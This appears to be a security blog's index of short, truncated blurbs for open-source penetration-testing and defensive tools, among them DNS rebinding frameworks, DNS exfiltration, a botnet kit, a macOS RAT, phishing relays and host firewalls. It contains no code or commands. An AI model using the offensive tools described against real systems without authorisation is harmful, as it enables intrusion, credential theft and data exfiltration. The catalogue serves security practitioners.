PowerShell Front-End for Windows Debugger Engine: DbgShell

The main impetus for DbgShell is that it’s just waaaay too hard to automate anything in the debugger. There are facilities today to assist in automating the debugger, of course. But in my opinion they are not meeting people’s needs. Using the built-in scripting language is arcane, limited,...

DNS Rebinding Attack Framework: Singularity

Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine’s IP address and to serve attack payloads to exploit vulnerable software on the target machine. It also ships with...

CLI for Ephemeral Penetration Testing: hideNsneak

This application assists in managing attack infrastructure for penetration testers by providing an interface to rapidly deploy, manage, and take down various cloud services. These include VMs, domain fronting, Cobalt Strike servers, API gateways, and firewalls. hideNsneak provides a simple...

PacketWhisper Exfiltration Toolset

PacketWhisper – Stealthily Transfer Data & Defeat Attribution Using DNS Queries & Text-Based Steganography, without the need for attacker-controlled Name Servers or domains; Evade DLP/MLS Devices; Defeat Data- & DNS Name Server Whitelisting Controls. Convert any file type e.g. executables, Office...

Mobile Application Testing Toolkit: Scrounger

Even though several other mobile application analysis tools have been developed, there is no one tool that can be used for both android and ios and can be called a “standard” must use on every mobile application assessment. The idea behind Scrounger is to make a metasploit-like tool that will not...

Dynamic Binary Analysis Tool: Manticore

Manticore is a prototyping tool for dynamic binary analysis, with support for symbolic execution, taint analysis, and binary instrumentation. Manticore comes with an easy-to-use command line tool that quickly generates new program “test cases” or sample inputs with symbolic execution. Each test...

The Offensive Web Application Penetration Testing Framework: TIDoS

TIDoS Framework is a comprehensive web-app audit framework. TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules. But before that, you need to set your own API KEYS for various OSINT purposes. To do so, open up APIKEYS.py...

Fast TCP tunnel over HTTP: chisel

Chisel is a fast TCP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go Golang. Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. Chisel is very similar t...

Open Source Host & Endpoint Security: Wazuh

Wazuh is a security detection, visibility, and compliance open source project. It was born as a fork of OSSEC HIDS, later was integrated with Elastic Stack and OpenSCAP evolving into a more comprehensive solution. Wazuh helps you to gain deeper security visibility into your infrastructure by...

Offensive and Defensive Cryptography: Crypton

Crypton is an educational library to learn and practice Offensive and Defensive Cryptography. It is basically a collection of explanation and implementation of all the existing vulnerabilities and attacks on various Encryption Systems Symmetric and Asymmetric, Digital Signatures, Message...

Bounded Model Checking Framework for Heap-implementations: HeapHopper

Heap metadata attacks have become one of the primary ways in which attackers exploit memory corruption vulnerabilities. While heap implementation developers have introduced mitigations to prevent and detect corruption, it is still possible for attackers to work around them. In part, this is becau...

Active Directory Privilege Relationships: BloodHound

BloodHound is a single page Javascript web application, built on top of Linkurious , compiled with Electron , with a Neo4j database fed by a PowerShell ingestor . BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attacks c...

Covert Backdoor Transmission Method: GhostTunnel

GhostTunnel is a covert backdoor transmission method that can be used in an isolated environment. It can attack the target through the HID device only to release the payload agent, then the HID device can be removed after the payload is released. GhostTunnel use 802.11 Probe Request Frames and...

Social Media Enumeration & Correlation Tool: Social Mapper

Social Mapper is a Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to searching popular social media sites for targets names and pictures to accurately detect and group a person’s...

Ring 0 Army Knife: r0ak

r0ak is a Windows command-line utility that enables you to easily read, write, and execute kernel-mode code with some limitations from the command prompt, without requiring anything else other than Administrator privileges. Motivation The Windows kernel is a rich environment in which hundreds of...

Subdomain Enumeration Tool: Amass

Amass is the subdomain enumeration tool with the greatest number of disparate data sources that performs analysis of the resolved names in order to deliver the largest number of quality results. Amass performs scraping of data sources, recursive brute forcing, crawling of web archives, permuting...

Compromising Online Accounts by Cracking Voicemail Systems: VoiceMailAutomator

voicemailautomator is a tool that serves as a Proof of Concept for the research I presented at DEF CON 26, “Compromising online accounts by cracking voicemail systems”. voicemailautomator supports two actions: “message” – retrieves and records the newest message in the voicemail system. It return...

An Open-Source Pre and Post Callback-Based Framework for macOS Kernel Monitoring: Kemon

If third-party vendors want to add new features to the macOS kernel, such as antivirus capabilities, ransomware blocking, data breach auditing, behavior monitoring and so on, they usually need the support of the system’s exported interfaces. At present, only two known official interfaces are...

Open source memory scanner written in C++: XenoScan

XenoScan is a memory scanner which can be used to scan the memory of processes to locate the specific locations of important values. These types of tools are typically used when hacking video games, as they allow one to locate the values representing the game’s state in memory. XenoScan is writte...

Defending Elections from Foreign Adversaries: Election Buster

Election Buster is an open source tool created in 2014 to identify malicious domains masquerading as candidate webpages and voter registration systems. During 2016, fake domains were used to compromise credentials of a Democratic National Committee DNC IT services company, and foreign adversaries...

Security Competition Infrastructure Automation Framework: Laforge

Laforge enables rapid development of infrastructure for the purpose of information security competitions. Using a simple and intuitive configuration language, Laforge manages a dependency graph and state management and allows for highly productive remote collaboration. The Laforge engine uses a...

Backdooring and Breaking Signatures: SMBetray

In SMB connections, the security mechanisms protecting the integrity of the data passed between the server and the client are SMB signing and encryption. The signatures in on SMB packets when SMB signing is used are based on keys derived from information sent over the net in cleartext during the...

OWA for hackers: ExchangeRelayX

ExchangeRelayX is a PoC tools to demonstrate the ability of an attacker to perform an SMB or HTTP based NTLM relay attack to the EWS endpoint on an on-premise Microsoft Exchange server to compromise the mailbox of the victim. This tool provides the attacker with an OWA looking interface, with...

Microsoft Research Detours Package

Detours is a software package for monitoring and instrumenting API calls on Windows. Detours has been used by many ISVs and is also used by product teams at Microsoft. Detours is now available under a standard open source license MIT. This simplifies licensing for programmers using Detours and...

Dynamic API Call Tracer for Windows and Linux Applications: Drltrace

Drltrace is a dynamic API calls tracer for Windows and Linux applications designed primarily for malware analysis. Drltrace is built on top of DynamoRIO dynamic binary instrumentation framework. Motivation Malware analysis is not an easy task. Sophisticated software packers like Themida and...

A framework for creating proxies: Mallet

Mallet is a tool for creating proxies for arbitrary protocols, along similar lines to the familiar intercepting web proxies, just more generic. It is built upon the Netty framework, and relies heavily on the Netty pipeline concept, which allows the graphical assembly of graphs of handlers. In the...

Detect Evil Maid Attacks: Do Not Disturb

Physical access or “evil maid” attacks are some of the most insidious threats faced by those of us who travel with our Macs. Do Not Disturb DND is a free, open-source utility that aims to detect and alert you of such attacks! One of the best ways to compromise a computer is with physical access...

Rogue Access Point Toolkit : hostapd-mana

hostapd-mana is a featureful rogue wifi access point tool. It can be used for a myriad of purposes from tracking and deanonymising devices aka Snoopy, gathering corporate credentials from devices attempting EAP aka WPE or attracting as many devices as possible to connect to perform MitM attacks...

Build Your Own Botnet: BYOB

BYOB is an open-source project that provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets, in order to improve their ability ...

Lightning Fast Web Crawler: Photon

Photon is a lightning fast web crawler which extracts URLs, files, intel & endpoints from a target. 160 requests per second while extensive data extraction is just another day for Photon! Main Features Data Extraction Photon extracts the following data while crawling by default: URLs in-scope &...

Network and System Reconnaissance Tool: Sandmap

Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine . It provides a user-friendly interface, automates and speeds up scanning and allows you to easily use many advanced scanning techniques. Key Features simple CLI with the ability to run pure Nmap engine...

Reconnaissance and Vulnerability Scanning Tool: Raccoon

Raccoon is a tool made for reconnaissance and information gathering with an emphasis on simplicity. It will do everything from fetching DNS records, retrieving WHOIS information, obtaining TLS data, detecting WAF presence and up to threaded dir busting and subdomain enumeration. Every scan output...

Advanced Man in the Middle Attack Framework: Evilginx

Evilginx is an attack framework for setting up phishing pages. Instead of serving templates of sign-in pages lookalikes, Evilginx becomes a relay between the real website and the phished user . Phished user interacts with the real website, while Evilginx captures all the data being transmitted...

Payload Generation Framework: SharpShooter

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw’s DotNetToJavaScript tool to invoke methods from the...

Block Unauthorized macOS Outgoing Network Traffic: LuLu

LuLu is the free, shared-source firewall for macOS. It’s goal is simple; block any unknown outgoing connections, until approved by the user. While it was designed to generically detect malware by flagging unauthorized networking connections, LuLu can also be used to block OS components or 3rd-par...

Query Windows Machine for RAM Artifacts: memtriage

Allows you to quickly query a live Windows machine for RAM artifacts. This tool utilizes the Winpmem drivers to access physical memory, and Volatility for analysis. Caveats: Doesn’t work with Device Guard enabled. Should be tested on machines before deploying. Example Usage usage: memtriage.exe -...

Spoof SSDP replies to phish for NTLM hashes: evil-ssdp

This tool responds to SSDP multicast discover requests, posing as a generic UPNP device on a local network. Your spoofed device will magically appear in Windows Explorer on machines in your local network. Users who are tempted to open the device are shown a configurable webpage. By default, this...

Firewall and Privatizing Proxy: macOS Fortress

macOS-Fortress is a Firewall, Blackhole, and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers. It is Kernel-level, OS-level, and client-level security for macOS. Built to address a steady stream of attacks visible on snort and server logs, as well as blocks ads, malicious...

Active Directory Reconnaissance: ADRecon

ADRecon is a tool which extracts various artifacts as highlighted below out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis. The report can provide a holistic picture of the current state of the target AD...

Indonesian Penetration Testing LFS: Dracos Linux

Dracos Linux is the Linux operating system from Indonesian, open source is built based on the Linux From Scratch under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing penetration testing...

DNS Rebinding Attack: DNS Rebind Toolkit

DNS Rebind Toolkit is a frontend JavaScript framework for developing DNS Rebinding exploits against vulnerable hosts and services on a local area network LAN. It can be used to target devices like Google Home, Roku, Sonos WiFi speakers, WiFi routers, “smart” thermostats, and other IoT devices. Wi...

Subdomain Discovery Tool: SubFinder

SubFinder is a subdomain discovery tool that uses various techniques to discover massive amounts of subdomains for any target. It has been aimed as a successor to the sublist3r project . SubFinder uses Passive Sources, Search Engines, Pastebins, Internet Archives, etc to find subdomains and then ...

The OSINT Omnibus

An Omnibus is defined as a volume containing several novels or other items previously published separately and that is exactly what the InQuest Omnibus project intends to be for Open Source Intelligence collection, research, and artifact management. By providing an easy to use interactive command...

Visualizing Windows Active Directory Event Logs: LogonTracer

Investigate malicious logon by visualizing and analyzing Windows active directory event logs. LogonTracer associates a host name or an IP address and account name found in logon-related events and displays it as a graph. This way, it is possible to see in which account login attempt occurs and...

Search Secrets in Various File Types: DumpsterDiver

DumpsterDiver is a tool used to analyze big volumes of various file types in search of hardcoded secret keys e.g. AWS Access Key, Azure Share Key or SSH keys based on counting the entropy. Additionally, it allows creating a simple search rules with basic conditions e.g. reports only csv file...

ZigBee Security Research Toolkit: KillerBee

KillerBee framework is a tool for attacking ZigBee and IEEE 802.15.4 networks. KillerBee is designed to simplify the process of sniffing packets from the air interface or a supported packet capture file libpcap or Daintree SNA, and for injecting arbitrary packets. Helper functions including IEEE...

RF Fuzzing Framework: TumbleRF

TumbleRF is a framework that orchestrates the application of fuzzing techniques to RF systems. While fuzzing has always been a powerful mechanism for fingerprinting and enumerating bugs within software systems, the application of these techniques to wireless and hardware systems has historically...

Detailed Heap Profiler: Memoro

Memoro is a highly detailed heap profiler. Memoro not only shows you where and when your program makes heap allocations, but will show you how your program actually used that memory. Memoro collects detailed information on accesses to the heap, including reads and writes to memory and when they...

Network Share Sniffer and Auto-Mounter for Crawling Remote File Systems: sharesniffer

sharesniffer is a network analysis tool for finding open and closed file shares on your local network. It includes auto-network discovery and auto-mounting of any open cifs and nfs shares. How to use Example to find all hosts on any local network with open/closed nfs/smb shares: python...

Pure python post-exploitation RAT for macOS & OSX: EvilOSX

A pure python, post-exploitation, RAT Remote Administration Tool for macOS / OSX. Features Emulate a simple terminal instance Undetected by anti-virus OpenSSL AES-256 encrypted payloads, HTTPS communication Multi-threaded No client dependencies pure python Persistent Simple extendable module syst...